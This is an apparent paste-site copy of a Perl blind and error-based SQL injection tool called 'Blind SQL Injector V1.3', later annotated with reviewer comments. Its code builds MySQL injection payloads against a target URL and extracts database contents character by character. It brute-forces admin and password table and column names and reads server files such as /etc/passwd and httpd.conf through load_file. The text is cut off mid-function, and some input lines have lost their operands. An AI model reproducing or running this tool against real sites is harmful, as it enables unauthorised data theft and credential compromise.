
Write a perl SQL injection tool

a guest
Jun 1st, 2012
213
0
Never
  1. #!/usr/bin/perl
  2. # blind sqlinjector [GET Method]
  3. # for educational purpose only!
  4. # by c4rp3nt3r@0x50sec.org
  5.  
  6. use POSIX;
  7. use LWP::UserAgent;
  8.  
######################### Configuration start #################################

# Every probe URL built below is "$target" . <payload> . "$comstr", with
# $nullstr standing in for whitespace between SQL keywords.  Nothing is
# validated: these values are interpolated verbatim into requests and regexes.
$target ="http://www.0x50sec.org/index.php?p=1'";       # prefix of every probe URL (author: string-context injection needs the trailing ' and a matching closing comment)
$turestr='c4rp3nt3r.jpg';   # boolean oracle: a probe counts as TRUE when this substring occurs in the response body (author: must be changed per site); it is used unescaped as a regex

###################### the two settings above must be set ###########################

$nullstr="%09";     # %20 + /**/ %09 %0a %0d    -- token used instead of a space between SQL keywords in every payload
$comstr="";         # closing string appended after every payload: # -- /* ;%00 $nullstr."aNd".$nullstr."'1'='1";

$tb_prefix='';      # prefix prepended to each candidate in @tables

# options read only by fuzz_webpath()
#
$somexfile='index.php';   # not read anywhere on this page; fuzz_webpath() uses its own literal
$domain='0x50sec.org';
$homeusr='c4rp3nt3r';

########################## Configuration end #################################
  28.  
# Candidate table names; fuzz_tb() / fuzz_tb_err_exp() issue one request per
# entry with $tb_prefix prepended.  A defender sees this as a burst of requests
# that differ only in the trailing identifier.
@tables=(
'admin',
'information_schema.tables',
'zipcode',
'joyboard_admin',
'tbl_manager',
'SuperUser',
'admins',
'n_news',
'enterprise_file_room',
'BOARD_TB',
'ADMIN_TB',
'campuslogin',
'users',
'user',
'usr_pw',
'salt',
'members',
'rg_member',
'mysql.user',
'hash',
'login',
'log_user',
'admin_user',
'adminuser',
'admin_info',
'member_admin',
'AdminUsers',
'administrables',
'administrateur',
'administrateurs',
'login_admin',
'login_admins',
'login_user',
'login_users',
'lost_pass',
'lost_passwords',
'lostpass',
'lostpasswords',
'stnuser',
'stuser',
'stusers',
'stuseres',
'staff',
'u_name',
'u_p',
'u_pass',
'Benutzer',
'usercontrol',
'user_pw',
'Benutzerliste',
'userlogins',
'userpasswd',
'admuser',
'system',
'adm',
'tb_user',
'x_admin',
'm_admin',
'manage',
'member',
'tbl_user',
'tbl_data',
'tbl_users',
'tbl_admin',
'tbl_admins',
'tbl_member',
'tbl_members',
'tbladmins',
'tb_club_admin',
'tb_club_member',
'tb_club_board_admin',
'admin_user',
'admin_userinfo',
'administrator',
'adminid',
'admin_id',
'adminuserid',
'admin_userid',
'AdminUID',
'adminusername',
'admin_username',
'adminname',
'admin_name',
'wp_users',
);
  115.  
  116. #$sql='select table_name from information_schema.tables where TABLE_SCHEMA=0x6368656d limit 0,1';
  117. #$final="shit%\' and OrDMiD(($sql),1,1))>";
  118. #$final = $final.$num." #";
  119.  
# ---- Shared global state (no `my`; the subs below read and write these) ----
# $x_fuzzsql  : last SQL expression handed to fuzz_half(), echoed in the summary
# $subset     : character position; the $ARGV[1] value taken here is overwritten
#               by dump_fuzz_half()'s own loop counter
# $result, $result_num : human-readable log text appended to by the probe subs
# @oktb       : character codes recovered by dump_fuzz_half(), printed as text below
# @ok_tbname, @ok_clmname, @ok_path : candidates that produced a TRUE oracle response
# $long       : scratch holding an array length (array evaluated in scalar context)
# $num, $oknum, @ok_usr_clm, @ok_pwd_clm : initialised here but not read by any sub on this page
$x_fuzzsql='';

$subset=1;
$subset=$ARGV[1];
$num=50;
$result="";
$result_num="";
$oknum=0;

$long=0;
$oktbnum='1';
@oktb=();
$long=@oktb;

@ok_tbname=();
$long=@ok_tbname;

@ok_usr_clm=();
$long=@ok_usr_clm;
@ok_pwd_clm=();
$long=@ok_pwd_clm;

@ok_path=();
$long=@ok_path;

@ok_clmname=();
$long=@ok_clmname;

#---------------------------------------------------------
print "\n";
print "\t|=-----------------------------------------=|\n";
print "\t|=------[ Blind SQL Injector V1.3 ]--------=|\n";
print "\t|=-------[ c4rp3nt3r\@0x50sec.org ]---------=|\n";
print "\t|=-----------------------------------------=|\n\n";

# Interactive entry point: shows the menu and runs exactly one chosen action.
dump_fuzz_half_alpha();

#fuzz_tb();
#fuzz_pwd_usr_clm();

print "-------------------------------\n\n";

# Summary: @oktb holds character codes, so each element is printed with %c.
print "[+]$x_fuzzsql:\n";
#print("@oktb\n");
foreach $oktbnum(@oktb)
{
    printf("%c",$oktbnum);
}
print "\n";

#print "[+]$sql:\n$result_num\n";
#print("@oktb\n");
#-------------------------------------------------------------

foreach $x_ok_tbname(@ok_tbname)
{
    print " ".$x_ok_tbname."\n";
}
foreach $x_ok_clm(@ok_clmname)
{
    print " ".$x_ok_clm."\n";
}
foreach $x_ok_path(@ok_path)
{
    print " ".$x_ok_path."\n";
}
print "\n";
print "[+] Enjoy Hacking...\n\n\007";
print "-------------------------------\n\n";
  189.  
  190. #################################
  191.  
# Interactive menu.  Reads one choice, builds the matching SQL expression and
# dispatches it either to dump_fuzz_half() (boolean-blind, one character per
# bisection) or to err_exp() (error-based, 62 characters per request); the
# remaining choices call the table/column/path wordlist subs directly.
# No arguments, no return value; all results land in the globals.
# NOTE(review): the `= ;` assignments below have lost their right-hand operand
# in this copy of the page (presumably an angle-bracketed filehandle read that
# the page's HTML swallowed); they are reproduced unchanged.
sub dump_fuzz_half_alpha
{

print 'Choose a number to be execute:
    [0] sql (from [STDIN])
    [1] version()
    [2] database()
    [3] user()
    [4] dump table_schema v5.x
    [5] dump table_name (table_schem=database() v5.x)
    [6] dump column_name (table_name= [STDIN] v5.x)
    [7] fuzz table_name v4.x
    [8] fuzz column_name v4.x
    [9] fuzz web path(\'read httpd.conf\')
    [a] load_file(\'/etc/passwd\')
    [b] load_file(\'c:\\boot.ini\')
    [c] load_file(\'file path from [STDIN]\')
    [d] load_file(\'file path from [STDIN] error base\')
    [e] dump table_schema (v5.x error base)
    [f] dump table_name (table_schem=database() v5.x error base)
    [g] dump column_name (table_name= [STDIN] v5.x error base)
    [h] fuzz table_name (v4.x error base)
    [i] fuzz column_name (v4.x error base)
    [x] sql (from [STDIN] error base)
    ';
    print "\n";
    print "Choose a number#";
    $xnum= ; chomp $xnum;
    # ---- boolean-blind branches (dump_fuzz_half) ----
    if($xnum eq '0')
    {
        print "Enter the sql#";
        $sql_stdin= ; chomp $sql_stdin;
        dump_fuzz_half($sql_stdin);
    }elsif($xnum eq '1')
    {
        $sql_x='version()';
        dump_fuzz_half($sql_x);
    }elsif($xnum eq '2')
    {
        $sql_x='database()';
        dump_fuzz_half($sql_x);
    }elsif($xnum eq '3')
    {
        $sql_x='user()';
        dump_fuzz_half($sql_x);
    }elsif($xnum eq '4')
    {
        $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
        dump_fuzz_half($sql_x);
    }elsif($xnum eq '5')
    {
        $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
        dump_fuzz_half($sql_x);
    }elsif($xnum eq '6')
    {
        print "Enter The table_name#";
        $sql_stdin= ; chomp $sql_stdin;
        $sql_stdin="0x".hexencode($sql_stdin);   # table name passed as a 0x.. hex literal rather than a quoted string
        $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
        dump_fuzz_half($sql_x);
    }elsif($xnum eq '7')
    {
        fuzz_tb();
    }elsif($xnum eq '8')
    {
        print "Enter The table name to fuzz the column#";
        $sql_stdin= ; chomp $sql_stdin;
        fuzz_pwd_usr_clm($sql_stdin);
    }elsif($xnum eq '9')
    {
        fuzz_webpath();
    }
    elsif($xnum eq 'a')
    {
        $file_path="load_file(0x".hexencode('/etc/passwd').")";
        dump_fuzz_half($file_path);
    }elsif($xnum eq 'b')
    {
        $file_path="load_file(0x".hexencode('c:\\boot.ini').")";
        $sql_x="load_file($file_path)";
        dump_fuzz_half($sql_x);

    }
    elsif($xnum eq 'c')
    {
        print "Enter The file path to load_file#";
        $sql_stdin= ; chomp $sql_stdin;
        $file_path="0x".hexencode($sql_stdin);
        $sql_x="load_file($file_path)";
        dump_fuzz_half($sql_x);
    # ---- error-based branches (err_exp) ----
    }elsif($xnum eq 'd')
    {
        print "Enter The file path to load_file#";
        $sql_stdin= ; chomp $sql_stdin;
        #$sql_stdin='/usr/local/apache2/htdocs/admin/admin.php';
        $file_path="0x".hexencode($sql_stdin);
        $sql_x="load_file($file_path)";
        err_exp($sql_x);
    }elsif($xnum eq 'e')
    {
        $sql_x='select'.$nullstr.'group_concat(SCHEMA_NAME)'.$nullstr.'from'.$nullstr.'information_schema.SCHEMATA';
        err_exp($sql_x);

    }elsif($xnum eq 'f')
    {

        $sql_x='select group_concat(table_name) from information_schema.tables where TABLE_SCHEMA=database()';
        err_exp($sql_x);
    }elsif($xnum eq 'g')
    {
        print "Enter The table_name#";
        $sql_stdin= ; chomp $sql_stdin;
        $sql_stdin="0x".hexencode($sql_stdin);
        $sql_x="select group_concat(column_name) from information_schema.columns where table_name=$sql_stdin";
        err_exp($sql_x);
    }elsif($xnum eq 'h')
    {
        fuzz_tb_err_exp();
    }elsif($xnum eq 'i')
    {
        print "Enter The table name to fuzz the column#";
        $sql_stdin= ; chomp $sql_stdin;
        fuzz_pwd_usr_clm_err($sql_stdin);
    }elsif($xnum eq 'x')
    {
        print "Enter the sql#";
        $sql_stdin= ; chomp $sql_stdin;
        err_exp($sql_stdin);
    }
    # any other choice falls through silently

}
  323. #################
  324. sub hexencode{ #Sub to hex encode
  325. @subvar= @_;
  326. my $sqlstr = $subvar[0];
  327. my $encoded_command="";
  328. my @ASCII = unpack("C*", $sqlstr);
  329. foreach $line (@ASCII) {
  330.  
  331. my $encoded = sprintf('%lx',$line);
  332. $encoded_command .= $encoded;
  333. }
  334. return $encoded_command;
  335. }
  336.  
  337. #################
# Probe a fixed list of file-system paths through the boolean oracle.
# Pass 1 sends one request per entry of @paths, pass 2 one per entry of
# @wwwpaths with 'index.php' appended; each request asks whether
# length(load_file(<hex path>))>0 and a TRUE response (body matches $turestr)
# appends the path to the global @ok_path and to $result.
# No arguments, no return value.  Server-side this looks like a burst of
# requests differing only in a 0x.. literal inside load_file().
sub fuzz_webpath
{

@ok_path=();
$long=@ok_path;

print "[*] Fuzzing path ...\n\n";
@paths=(
'/usr/local/apache/conf/httpd.conf',
'/usr/local/apache2/conf/httpd.conf',
'/usr/local/apache2/conf/extra/httpd-ssl.conf', #apache2.2
'/usr/local/etc/apache/httpd.conf',
'/etc/apache2/apache2.conf',                #ubuntu 2.0
'/etc/httpd/conf/httpd.conf',
'/var/log/apache2/error_log',
'/var/log/apache/access_log',
'/var/apache2/logs/error_log',
'/var/log/httpd/error_log',
'/etc/passwd',
'/etc/issue',
'/proc/version',
'/proc/self/environ',
);

# document-root guesses; $homeusr / $domain come from the configuration block
@wwwpaths=(
'/var/www/',
'/data/html/',
'/www/htdocs/',
'/home/webadm/',
'/home/webadm/public_html/',
'/usr/local/webroot/',
'/var/apache2/htdocs/',
'/var/www/htdocs/',
'/var/www/html/',
'/opt/lampp/htdocs/',
'/var/www/localhost/htdocs/',
'/usr/local/apache/htdocs/',
'/usr/local/apache2/htdocs/',
'/usr/local/www/apache22/data/',
'/usr/local/www/data/',
'/export/home/webhost/apache/apache1/htdocs/',
'/web/',
'/data/',
'/www/',
"/home/$homeusr/html/",
"/home/$homeusr/docs/",
"/home/$homeusr/public_html/",
"/home/$homeusr/www/",
"/home/$domain/www/",
"/home/$domain/public_html/",
"/www/htdocs/$domain/",
"/home/$homeusr/$domain/",
"/usr/local/webroot/$domain/",
"/home/$homeusr/",
"/www/users/$domain/",
"/home/hosting_users/$homeusr/",
"/data/webroot/$domain/",
"/export/$homeusr/public_html/",
"/home/www/websites/",
"/home/www/websites/$homeusr/",
"/var/www/html/$homeusr",
);

    foreach $path(@paths)
    {
        my $xfile="0x".hexencode($path);
        $final=$target.$nullstr.'aND'.$nullstr.'length(load_file('.$xfile.'))>0'.$comstr;
        $ua =  new LWP::UserAgent or die;   # a fresh agent per request; $proxy is never assigned on this page, so the proxy line is a no-op unless set elsewhere
        $ua->timeout(35);
        $ua->proxy("http", "http://$proxy/") if defined($proxy);
        $tbres = $ua->get($final);
        print $final."\n";
        print "[*] Fuzzing web path  [$path]"."\n";
        if($tbres->content =~ /$turestr/)   # $turestr is interpolated as a regex, not matched literally
        {
        $result=$result."[+] Found ->".$path."\n\n";
        print " \n[+] Found web path-> [$path]"."\n\n";
        $long=@ok_path;
        @ok_path[$long]=$path;  # append (single-element slice used as an element store)
        }
    }
    foreach $wpath(@wwwpaths)
    {
        $some='index.php';
        $wpath=$wpath.$some;   # $wpath aliases the array element, so @wwwpaths itself is modified here
        my $xxfile="0x".hexencode($wpath);
        $final=$target.$nullstr.'aND'.$nullstr.'LEnGth(lOad_FiLe('.$xxfile.'))>0'.$comstr;
        $ua2 =  new LWP::UserAgent or die;
        $ua2->timeout(35);
        $ua2->proxy("http", "http://$proxy/") if defined($proxy);
        $tbres = $ua2->get($final);
        print "[*] Fuzzing web path [$wpath]"."\n";
        print $final."\n";
        if($tbres->content =~ /$turestr/)
        {
            $result=$result."[+] Found ->".$wpath."\n\n";
            print " \n[+] Found web path-> [$wpath]"."\n\n";
            $long=@ok_path;
            @ok_path[$long]=$wpath; # append the path that produced a TRUE response
        }
    }
}
  440.  
# Error-based variant of fuzz_tb(): one request per entry of @tables.
# Each request embeds "SELECT COUNT(*) FROM <table>" in the well-known
# floor(rand(0)*2)/GROUP BY construct so that MySQL answers with a
# "Duplicate entry '1<value>' for key" error; the text between '1 and
# ' for key is taken as the query result.  Tables that answer are appended
# to the global @ok_tbname.  No arguments, no return value.
# Detection note: the literal `floor(rand(0)*2)` together with `group+by`
# and `information_schema.tables` in a query string is the fingerprint of
# this technique, as is the error text in the response.
sub fuzz_tb_err_exp
{
$xsql = 'SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--

# (author) for MySQL 4.x this is simply a table-name brute force
#print "$sql\n\007\n";
@ok_tbname=();
$long=@ok_tbname;

print "[*]Fuzz table name...\n\n";

    foreach $tbname(@tables)
    {

        print "[*]Fuzz table name [$tbname]"."\n";
        $sqlexp = $xsql.$nullstr.$tb_prefix.$tbname;
        $ua =  new LWP::UserAgent or die;
        $ua->timeout(35);
        $ua->proxy("http", "http://$proxy/") if defined($proxy);   # $proxy is not assigned anywhere on this page

        $payload = "aNd+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
        $final=$target.'+'.$payload.$comstr;
        print $final."\n";
        $res=$ua->get($final);
        #print $res->content;
        # greedy match across newlines; $& is the whole matched error text
        if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
        {
            $content = $&;
            $content =~ s/Duplicate entry \'1//;
            $content =~ s/\' for key //;
            if(length($content)<1)
            {
            print "[+] got data finished!\n";
            next;
            }else
            {

                print " \n[+] Found table_name-> [$tbname]"."\n\n";
                $long=@ok_tbname;
                @ok_tbname[$long]=$tbname;  # append the table name that produced an answer
                $result = $content;   # note: overwrites, rather than appends to, the shared $result log
                print "[+] content : \n$result\n\n";
            }
        }else
        {
            print "[-]$tbname doesn't exist!\n";
            next;
        }

    }

}
  493.  
# Boolean-blind table-name guessing: one request per entry of @tables,
# each appending "AND (SELECT COUNT(*) FROM <prefix><table>)" to $target.
# A response body matching $turestr is taken to mean the table exists; such
# names are appended to the global @ok_tbname and logged in $result.
# No arguments, no return value.
sub fuzz_tb
{
$xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt(*)'.$nullstr.'fRoM';#.think_md5hash)>0--

# (author) for MySQL 4.x this is simply a table-name brute force
#print "$sql\n\007\n";
@ok_tbname=();
$long=@ok_tbname;

print "[*]Fuzz table name...\n\n";

    foreach $tbname(@tables)
    {
        $final=$target.$xsql.$nullstr.$tb_prefix.$tbname.')'.$comstr;
        $ua =  new LWP::UserAgent or die;   # new agent for every request
        $ua->timeout(35);
        $ua->proxy("http", "http://$proxy/") if defined($proxy);   # $proxy is not assigned anywhere on this page
        $tbres = $ua->get($final);
        print "[*]Fuzz table name [$tbname]"."\n";
        print $final."\n";
        if($tbres->content =~ /$turestr/)   # $turestr is used as a regex
        {
            $result=$result."[+] Found ->".$tbname."\n\n";
            print " \n[+] Found table_name-> [$tbname]"."\n\n";
            $long=@ok_tbname;
            @ok_tbname[$long]=$tbname;  # append the table name that produced a TRUE response
        }
    }

}
  524. ###################
# Error-based column-name guessing against one table.
#
# Parameter: $xok_tbname - table name, interpolated into SQL unchanged.
# For each candidate in @usrclms and then @pwdclms it sends
# "SELECT COUNT(<column>) FROM <table>" wrapped in the floor(rand(0)*2)/
# GROUP BY duplicate-key construct and treats a "Duplicate entry '1...'"
# error as proof that the column exists.  Every hit is appended to the
# global @ok_clmname; the last hit of each list is left in $usr / $pwd and
# combined into $fuzzsql, which is printed but (see the commented call) not
# executed.  No return value.
sub fuzz_pwd_usr_clm_err
{
my($xok_tbname)=@_;
##-------

# candidate user-name columns (the last few entries are Chinese column names)
@usrclms=(
'id',
'idx',
'admin',
'adminname',
'admin_id',
'user_name',
'user',
'username',
'login',
'email',
'user_id',
'no',
'uid',
'cnumber',
'zipcode',
'job',
'mail',
'usr',
'name',
'u_name',
'login_id',
'administrators',
'administrator',
'adminuser',
'adminname',
'admin_name',
'admin_user',
'admin_username',
'user_admin',
'user_n',
'AD_id',
'user_un',
'user_uname',
'user_username',
'user_usernm',
'user_usernun',
'user_usrnm',
'usr',
'usr_n',
'usr_name',
'usr_pass',
'usr2',
'usrn',
'userid',
'usrnam',
'usrname',
'usrnm',
'adminusername',
'bbsuser',
'bbsid',
'bbsusername',
'permission',
'access',
'accnt',
'accnts',
'account',
'accounts',
'帐号',
'管理员',
'权限',
'用户名',
'会员',
'用户帐号',
);
# candidate password columns
@pwdclms=(
'password',
'userpass',
'pass',
'pwd',
'psw',
'userpwd',
'userpw',
'psd',
'pw',
'user_pass',
'admin_password',
'PassWD',
'user_password',
'uPassword',
'user_pwd',
'adminpwd',
'admin_pass',
'admin_pwd',
'admin_password',
'login_pass',
'login_passwd',
'login_password',
'login_pw',
'AD_pass',
'login_pwd',
'login_user',
'login_username',
'adminpsw',
'adminupass',
'user_pass',
'user_passw',
'user_passwd',
'user_pw',
'user_pwd',
'user_pword',
'pword',
'user_pwrd',
'密码',
'用户密码',
'编号',
);

    $ua =  new LWP::UserAgent or die;   # one agent reused for every request in this sub
    $ua->timeout(35);
    $ua->proxy("http", "http://$proxy/") if defined($proxy);   # $proxy is not assigned anywhere on this page

    print "\n[*]Fuzz user column name...\n\n";
    foreach $usr_clm(@usrclms)
    {

        $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
        $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
        $final=$target.'+'.$payload.$comstr;
        print $final."\n";
        $res=$ua->get($final);
        #print $res->content;
        # greedy match across newlines; $& is the full matched error text
        if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
        {
            $content = $&;
            $content =~ s/Duplicate entry \'1//;
            $content =~ s/\' for key //;
            if(length($content)<1)
            {
            print "[+] got data finished!\n";
            next;
            }else
            {
                $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
                print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                $usr=$usr_clm;   # remembers only the most recent hit
                $long=@ok_clmname;
                $ok_clmname[$long]=$usr_clm;
                $result = $content;   # overwrites the $result line appended just above
                print "[+] content : \n$usr_clm\n\n";
            }
        }else
        {
            print "[-]$usr_clm doesn't exist!\n";
            next;
        }

    }

    print "\n[*]Fuzz password column name...\n\n";
    foreach $pwd_clm(@pwdclms)
    {
        $sqlexp = 'SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname;
        $payload = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($sqlexp)),1,62)))a+from+information_schema.tables+group+by+a)b)";
        $final=$target.'+'.$payload.$comstr;
        print $final."\n";
        $res=$ua->get($final);
        #print $res->content;
        if ($res->content =~/Duplicate entry \'1([\s\S]*)\' for key /)
        {
            $content = $&;
            $content =~ s/Duplicate entry \'1//;
            $content =~ s/\' for key //;
            if(length($content)<1)
            {
            print "[+] got data finished!\n";
            next;
            }else
            {
                $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
                print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
                $pwd=$pwd_clm;   # remembers only the most recent hit
                $long=@ok_clmname;
                $ok_clmname[$long]=$pwd_clm;
                $result = $content;
                print "[+] content : \n$pwd_clm\n\n";
            }
        }else
        {
            print "[-]$pwd_clm doesn't exist!\n";
            next;
        }
    }
    # $usr / $pwd stay undefined when no column matched; the string is printed only
    $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
    print "[+]".$fuzzsql."\n";
    #dump_fuzz_half($fuzzsql);

}
  718. ##################################
# Boolean-blind column-name guessing against one table.
#
# Parameter: $xok_tbname - table name, interpolated into SQL unchanged.
# For each candidate in @usrclms and then @pwdclms it appends
# "AND (SELECT COUNT(<column>) FROM <table>)" to $target and treats a
# response body matching $turestr as proof that the column exists.
# Hits are appended to the global @ok_clmname and logged in $result; the
# last hit of each list is left in $usr / $pwd and combined into $fuzzsql,
# which is printed but (see the commented call) not executed.  No return value.
sub fuzz_pwd_usr_clm
{
my($xok_tbname)=@_;
##-------

# candidate user-name columns (the last few entries are Chinese column names)
@usrclms=(
'id',
'idx',
'admin',
'adminname',
'admin_id',
'user_name',
'user',
'username',
'login',
'email',
'mail',
'AD_id',
'usr',
'name',
'u_name',
'login_id',
'administrators',
'administrator',
'adminuser',
'adminname',
'admin_name',
'admin_user',
'admin_username',
'user_admin',
'user_n',
'user_un',
'user_uname',
'user_username',
'user_usernm',
'user_usernun',
'user_usrnm',
'usr',
'usr_n',
'usr_name',
'usr_pass',
'usr2',
'usrn',
'userid',
'usrnam',
'usrname',
'usrnm',
'adminusername',
'bbsuser',
'bbsid',
'bbsusername',
'permission',
'access',
'accnt',
'accnts',
'account',
'accounts',
'帐号',
'管理员',
'权限',
'用户名',
'会员',
'用户帐号',
);
# candidate password columns
@pwdclms=(
'password',
'userpass',
'pass',
'pwd',
'psw',
'userpwd',
'userpw',
'psd',
'pw',
'user_pass',
'admin_password',
'PassWD',
'user_password',
'uPassword',
'user_pwd',
'adminpwd',
'admin_pass',
'admin_password',
'login_pass',
'login_passwd',
'login_password',
'login_pw',
'login_pwd',
'login_user',
'login_username',
'adminpsw',
'AD_pass',
'admin_pwd',
'adminupass',
'user_pass',
'user_passw',
'user_passwd',
'user_pw',
'user_pwd',
'user_pword',
'pword',
'user_pwrd',
'密码',
'用户密码',
'编号',
);

    $ua =  new LWP::UserAgent or die;   # one agent reused for every request in this sub
    $ua->timeout(35);
    $ua->proxy("http", "http://$proxy/") if defined($proxy);   # $proxy is not assigned anywhere on this page

    print "\n[*]Fuzz user column name...\n\n";
    foreach $usr_clm(@usrclms)
    {
        $xsql = $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$usr_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--
        $final=$target.$xsql;
        $tbres = $ua->get($final);
        print "[*]Fuzz $usr_clm from $xok_tbname ...\n";
        print $final."\n";
        if($tbres->content =~ /$turestr/)   # $turestr is used as a regex
        {
            $result=$result."[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n";
            print "\n[+] Found column_name->"."[$usr_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
            $usr=$usr_clm;   # remembers only the most recent hit
            $long=@ok_clmname;
            $ok_clmname[$long]=$usr_clm;
            #last;
        }
    }

    print "\n[*]Fuzz password column name...\n\n";
    foreach $pwd_clm(@pwdclms)
    {
        $xsql = $nullstr."union".$nullstr."select".$nullstr;   # dead store: replaced by the next statement
    $xsql =
    $nullstr.'aND(SeLEcT'.$nullstr.'CoUNt('.$pwd_clm.')'.$nullstr.'fRoM'.$nullstr.$xok_tbname.')'.$comstr;#.think_md5hash)>0--

        $final=$target.$xsql;
        $tbres = $ua->get($final);
        print "[*]Fuzz [$pwd_clm] from [$xok_tbname] ...\n";
        print $final."\n";
        if($tbres->content =~ /$turestr/)
        {
            $result=$result."[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n";
            print "\n[+] Found column_name->"."[$pwd_clm]"." from table_name->"."[$xok_tbname]"."\n\n";
            $pwd=$pwd_clm;   # remembers only the most recent hit
            $long=@ok_clmname;
            $ok_clmname[$long]=$pwd_clm;
            #last;
        }
    }
    # $usr / $pwd stay undefined when no column matched; the string is printed only
    $fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
    print "[+]".$fuzzsql."\n";
    #dump_fuzz_half($fuzzsql);

}
  875.  
  876. #################################
# Recover the result of one SQL expression character by character.
#
# Parameter: $fuzzsql - SQL expression whose (string) value is to be read.
# For positions 1..799 it calls fuzz_half() to bisect the ASCII code of the
# character at that position over 0..127; a returned 0 marks the end of the
# string and stops the loop (a 10 is appended so the summary prints a
# newline).  Codes are appended to the global @oktb, which is never cleared
# here, so a second call appends after the previous result; $result and
# $result_num are extended with position:code pairs.  Overwrites the global
# $subset.  No return value.  Cost: roughly seven requests per character.
sub dump_fuzz_half
{
    my($fuzzsql) = @_;
    #$fuzzsql="seleCt concat($usr,0x3a,$pwd) from $xok_tbname limit 1";
    $fucked='';
    for($subset=1;$subset<800;$subset++)
    {
        $oknum=fuzz_half($fuzzsql,$subset,0,127);
        if($oknum==0)   # ascii(mid(...)) is 0 past the end of the string
        {
            $long=@oktb;
            @oktb[$long]=10;
            last;
        }
        $result.=$subset.":".$oknum."\n";
        $result_num.=$oknum." ";
        $long=@oktb;
        @oktb[$long]=$oknum;   # append (single-element slice used as an element store)
        #print "$result";
        #print "$result_num\n";
        # progress: echo everything recovered so far as text
        print "[+]$fuzzsql:\n";

        foreach $xoktbnum(@oktb)
        {
            printf("%c",$xoktbnum);
        }
        print "\n\n";
    }
    print "\n\n\n";

}
  908.  
  909. ##################################
# Recursive bisection of one character's ASCII code through the boolean oracle.
#
# Parameters: $sql    - SQL expression being read
#             $subset - 1-based character position inside its value
#             $min    - value already known to produce the TRUE page
#             $max    - value already known NOT to produce the TRUE page
# Each call sends one request asking ascii(mid((<sql>),<pos>,1)) > <mid> and
# narrows the interval to the half the oracle selects.  Returns 0 when the
# interval has collapsed to (0,1), i.e. the character is NUL / end of string,
# and otherwise $max once $max-$min==1.  The recursive branches carry no
# explicit return; the value relies on Perl returning the last evaluated
# expression.  Also stores $sql in the global $x_fuzzsql for the summary.
# (author) recursive bisection helper originally written for ORDER BY column counting
sub fuzz_half
{
   # (author) ($min,$max) bounds the search interval; the answer lies inside it and the
   # interval is halved until it is found
   # (author) $min: confirmed largest value that still renders the normal page
   # (author) $max: confirmed smallest value that does not; it is the upper bound, hence "max"
   my ($sql,$subset,$min, $max) = @_;
   $x_fuzzsql=$sql;
   if($max==1&&$min==0)
   {
        return 0;
   }
   if($max-$min==1)# (author) when the failing bound is exactly one above the passing bound the
    {               # search is over; return it (the original note says $min, the code returns $max)
        return $max;
   }
   # (author) otherwise probe the midpoint of the interval
   my $mid=int(($min+$max)/2);# integer mean of the two bounds
   #print "max:$max,min:$min,mid=$mid\n";
    $final=$nullstr."AnD".$nullstr."ascii(mid(($sql)%2C".$nullstr."$subset%2C".$nullstr."1))>";
    $final = $target.$final.$mid.$comstr;

    print "[*] Test ascii(MiD(($sql)%2C$subset%2C1))>$mid...\n";
    print $final."\n";
   #print $final."\n";
    my $lwp = new LWP::UserAgent or die;   # no timeout and no proxy here, unlike the other subs
    $lwp->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");

   my $res = $lwp->get($final);
    my $myres=$res->content; #for test
   #printf($myres) ;    #for test
   #if($myres=~/http:\/\/login.renren.com\/callback.do/)
    #To judge if the login is sucess
    if($res->content =~ /$turestr/)   # TRUE page => the code is above $mid
   {
        $min=$mid;
        fuzz_half($sql,$subset,$min,$max);
   }
    else
    {
        $max=$mid;
        fuzz_half($sql,$subset,$min,$max);
    }
}
  953.  
# Error-based extraction of one SQL expression, 62 characters per request.
#
# Parameter: $loadx - SQL expression whose value is to be read.
# Each iteration wraps substring((<loadx>),$i,62) in the floor(rand(0)*2)/
# GROUP BY duplicate-key construct and parses the value out of MySQL's
# "Duplicate entry '1<value>' for key" error in the response body.  Stops on
# an empty value, on a missing error text, or after ~8000 characters.
# Resets and then fills the global $result, prints it, and appends it to
# result.txt in the current directory (bareword handle, unchecked open; the
# path is a constant, so the 2-arg form carries no mode-injection risk here).
# No return value.
# Detection note: `floor(rand(0)*2)`, `group+by` and `information_schema.tables`
# in a query string, plus the duplicate-key error in the reply, fingerprint
# this technique.
sub err_exp
{
    my($loadx) = @_;

    $ua2 = new LWP::UserAgent or die;
    $ua2->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");
    $ua2->timeout(35);
    $ua2->proxy("http", "http://$proxy/") if defined($proxy);   # $proxy is not assigned anywhere on this page
    $result='';
